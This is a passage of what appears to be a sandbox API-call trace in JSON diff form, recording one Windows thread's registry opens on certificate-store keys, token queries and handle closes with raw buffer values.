+ }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\TrustedPeople\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1821 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000055c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1822 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000055c" + } + ], + "repeated": 0, + "id": 1823 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000055c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000558" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\TrustedPeople\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1824 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000055c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1825 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000055c" + } + ], + "repeated": 0, + "id": 1826 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1827 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000055c" + } + ], + "repeated": 0, + "id": 1828 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1829 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e870b", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1830 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e8728", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1831 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000055c" + } + ], + "repeated": 0, + "id": 1832 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1833 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e870b", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1834 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e8728", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1835 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000055c" + } + ], + "repeated": 0, + "id": 1836 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1837 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1838 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e878d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1839 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1840 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "H\\xf1[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\xdb!\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v1\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00d\\xf1[\\x05p\\xf2[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\xe0\\xf1[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's0\\xf2[\\x05\\x93!\\xd6\\xfa\\x14\\xed[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff,\\xf2[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%sl\\xf2[\\x05\\xd4\\xf4\\x8c\\xf2,\\xf2\\x1c\\xf2\\x90\\xf2\\x00\\x00<\\xff\\x00\\x00\\xd4\\xf4[\\x05\\x8c\\xf2[\\x05\\x90\\xf2[\\x05\\x00\\x00\\x00\\x00@\\xf2[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00l\\xf2[\\x05" + } + ], + "repeated": 0, + "id": 1841 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1842 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1843 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1844 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\trust\\PhysicalStores" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\trust\\PhysicalStores" + } + ], + "repeated": 0, + "id": 1845 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e86a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1846 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000055c" + } + ], + "repeated": 0, + "id": 1847 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1848 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1849 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e878d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1850 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1851 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "H\\xf1[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\xdb!\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v1\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00d\\xf1[\\x05p\\xf2[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\xe0\\xf1[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's0\\xf2[\\x05\\x93!\\xd6\\xfa\\x14\\xed[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff,\\xf2[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%sl\\xf2[\\x05\\xd0\\xf4\\x8c\\xf2,\\xf2\\x1c\\xf2\\x90\\xf2\\x00\\x00<\\xff\\x00\\x00\\xd0\\xf4[\\x05\\x8c\\xf2[\\x05\\x90\\xf2[\\x05\\x00\\x00\\x00\\x00@\\xf2[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00l\\xf2[\\x05" + } + ], + "repeated": 0, + "id": 1852 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1853 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1854 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1855 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000055c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\trust" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\trust" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1856 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e86ce", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1857 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fa617", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000055c" + } + ], + "repeated": 0, + "id": 1858 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1859 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000055c" + } + ], + "repeated": 0, + "id": 1860 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e870b", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1861 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e8728", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000055c" + } + ], + "repeated": 0, + "id": 1862 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1863 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000055c" + } + ], + "repeated": 0, + "id": 1864 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1865 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e878d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000055c" + } + ], + "repeated": 0, + "id": 1866 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x0000055c" + } + ], + "repeated": 0, + "id": 1867 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\x10\\xf0[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00# \\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v.\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00,\\xf0[\\x058\\xf1[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\xa8\\xf0[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's\\xf8\\xf0[\\x05\\xdb \\xd6\\xfa\\xdc\\xeb[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\xf4\\xf0[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s4\\xf1[\\x05\\x98\\xf3T\\xf1\\xf4\\xf0\\xe4\\xf0X\\xf1\\x00\\x00<\\xff\\x00\\x00\\x98\\xf3[\\x05T\\xf1[\\x05X\\xf1[\\x05\\x00\\x00\\x00\\x00\\x08\\xf1[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x004\\xf1[\\x05" + } + ], + "repeated": 0, + "id": 1868 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000055c" + } + ], + "repeated": 0, + "id": 1869 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1870 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000055c" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1871 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000055c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\trust" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\trust" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1872 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e86ce", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000055c" + } + ], + "repeated": 0, + "id": 1873 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000055c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\trust\\" + } + ], + "repeated": 0, + "id": 1874 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000560" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000055c" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\trust\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1875 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000560" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1876 + }, + { + "timestamp": "2025-03-07 